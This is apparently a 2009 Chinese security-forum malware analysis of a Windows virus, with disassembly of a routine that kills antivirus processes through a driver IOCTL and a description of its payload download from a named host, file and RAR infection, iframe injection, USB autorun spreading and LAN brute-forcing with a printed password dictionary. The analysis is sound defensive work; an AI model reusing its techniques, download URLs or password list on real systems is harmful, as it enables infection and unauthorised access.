如果找到则把相应的进程ID发给AsynCom.sys这个驱动程序,并发送IRP(222008h)给该驱动,用以结束相应进程。
.text:00401A5A mov eax, offset String ; "safeboxTray.exe|360tray.exe|rsmain.exe|"...
.text:00401A5F push edi
.text:00401A60 mov esi, eax
.text:00401A62 cmp byte ptr String, bl ; "safeboxTray.exe|360tray.exe|rsmain.exe|"...
.text:00401A68 jz short loc_401A76
.text:00401A6A
.text:00401A6A loc_401A6A: ; CODE XREF: fuckav+24j
.text:00401A6A cmp byte ptr [esi], '|'
.text:00401A6D jnz short loc_401A71
.text:00401A6F mov [esi], bl
.text:00401A71
.text:00401A71 loc_401A71: ; CODE XREF: fuckav+1Dj
.text:00401A71 inc esi
.text:00401A72 cmp [esi], bl
.text:00401A74 jnz short loc_401A6A
.text:00401A76
.text:00401A76 loc_401A76: ; CODE XREF: fuckav+18j
.text:00401A76 mov esi, eax
.text:00401A78 cmp byte ptr String, bl ; "safeboxTray.exe|360tray.exe|rsmain.exe|"...
.text:00401A7E jz short loc_401AD7
.text:00401A80
.text:00401A80 loc_401A80: ; CODE XREF: fuckav+85j
.text:00401A80 mov [ebp+var_4], ebx
.text:00401A83
.text:00401A83 loc_401A83: ; CODE XREF: fuckav+76j
.text:00401A83 push esi ; lpString2
.text:00401A84 mov [ebp+InBuffer], ebx
.text:00401A87 mov [ebp+BytesReturned], ebx
.text:00401A8A call bianli
.text:00401A8F mov [ebp+InBuffer], eax
.text:00401A92 cmp eax, ebx
.text:00401A94 jz short loc_401AC8
.text:00401A96 push ebx ; lpOverlapped
.text:00401A97 lea eax, [ebp+BytesReturned]
.text:00401A9A push eax ; lpBytesReturned
.text:00401A9B push ebx ; nOutBufferSize
.text:00401A9C push ebx ; lpOutBuffer
.text:00401A9D push 4 ; nInBufferSize
.text:00401A9F lea eax, [ebp+InBuffer]
.text:00401AA2 push eax ; lpInBuffer
.text:00401AA3 push 222008h ; dwIoControlCode
.text:00401AA8 push [ebp+hDevice] ; hDevice
.text:00401AAB call ds:DeviceIoControl
将自身复制到\\dllcache\\systembox.bak
从自身资源中读取数据写入%system32%\twain.dll
.text:00401569 call copy
.text:0040156E push offset aTwain_dll ; "twain.dll"
.text:00401573 lea eax, [esp+90Ch+systempath]
.text:0040157A push 5Ch ; Ch
.text:0040157C push eax ; Str
.text:0040157D call ds:strrchr
.text:00401583 pop ecx
.text:00401584 pop ecx
.text:00401585 inc eax
.text:00401586 push eax ; lpString1
.text:00401587 call ds:lstrcpyA
.text:0040158D push ebx ; int
.text:0040158E push 6 ; dwFlagsAndAttributes
.text:00401590 push 65h ; __int16
.text:00401592 lea eax, [esp+914h+systempath]
.text:00401599 push eax ; lpFileName
.text:0040159A call resource
.text:0040159F push 1 ; int
.text:004015A1 push ebx ; dwFlagsAndAttributes
.text:004015A2 push ebx ; __int16
.text:004015A3 lea eax, [esp+914h+systempath]
.text:004015AA push eax ; lpFileName
.text:004015AB call resource
将这个写入HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\SvcHost的netsvcs键下,启动服务
最后释放一个批处理删除自身文件
twain.dll分析(代码过长,所以只发分析报告拉)
初始化:首先创建一个名为4F9E860C-9BE9-474b-8FD1-F0EEDB20C77B的事件,对要使用的网址进行解密(解密后为http://www.dy2004.com/winxp/mm.txt)
创建多个线程
线程1:每隔0.5秒访问一次www.dy2004.com,如果访问到了,则向其80端口发送数据包获得mm.htm
线程2:将urlmon.dll拷贝到%temp%\Nettemp.dll,加载之,获取URLDownloadToFileA函数地址,下载http://www.dy2004.com/winxp/mm.txt到%temp%\TempLocal.txt
读取该配置文件并下载和运行其中指定的病毒和木马程序,并把WEBTEXT:后面的内容(是个iframe挂马网址)存在一个buffer中备用
线程3:打开名为[url=]\\\\.\\USBDTDOS[/url]的设备,遍历杀软进程并如果找到则把相应的进程ID发给USBDTDOS这个设备,并发送IRP(222008h)给该驱动,用以结束相应进程。(与上面结束杀软过程相同)
线程4:感染文件线程
遍历磁盘分区,不包括(A:\,B:\)
感染所有分区的exe文件,但不感染如下文件夹内的文件
WinRAR
WindowsUpdate
Windows NT
Windows Media Player
Outlook Express
NetMeeting
MSN Gaming Zone
Movie Maker
microsoft frontpage
Messenger
Internet Explorer
InstallShield Installation Information
ComPlus Applications
Common Files
RECYCLER
System Volume Information
Documents and Settings
WinNT
WINDOWS
遍历所有分区的aspx,asp,htm,html文件,在其尾部加入iframe代码(来自刚才从配置文件中读取的)
遍历所有分区的.rar文件 先以%s X -ibck \"%s\" \"%s\\\的参数将压缩包解压,感染后再以%s M -ibck -r -o+ -ep1 \"%s\" \"%s\\*\的参数压缩回去。
线程5:U盘传播线程:遍历磁盘,查找可移动存储,在可移动存储根目录释放autorun.inf 在recycle.{645FF040-5081-101B-9F08-00AA002F954E}目录下释放ghost.exe
线程6:局域网传播线程
以一个密码字典猜解局域网中的机器,
用户名:Administrator,Guest,admin,Root,
密码:1234,password,6969,harley,123456,golf,pussy,mustang,1111,shadow'
',1313,fish,5150,7777,qwerty,baseball,2112,letmein,12345678,12345,'
'ccc,admin,5201314,qq520,1,12,123,1234567,123456789,654321,54321,1'
'11,000000,abc,pw,11111111,88888888,pass,passwd,database,abcd,abc1'
'23,pass,sybase,123qwe,server,computer,520,super,123asd,0,ihavenop'
'ass,godblessyou,enable,xp,2002,2003,2600,alpha,110,111111,121212,'
'123123,1234qwer,123abc,007,a,aaa,patrick,pat,administrator,root,s'
'ex,god,fuckyou,fuck,abc,test,test123,temp,temp123,win,pc,asdf,pwd'
',qwer,yxcv,zxcv,home,xxx,owner,login,Login,pw123,love,mypc,mypc12'
'3,admin123,mypass,mypass123,901100
如果成功则下载http://www.dy2004.com/winxp/mm.exe并在对方机器上执行,并感染对方的机器(和本机感染代码相同)
PS:弱弱的问下 我这水平能入咱那个kafan hunters么 很想跟大牛学习阿
[ 本帖最后由 newcenturysun 于 2009-5-27 00:03 编辑 ] |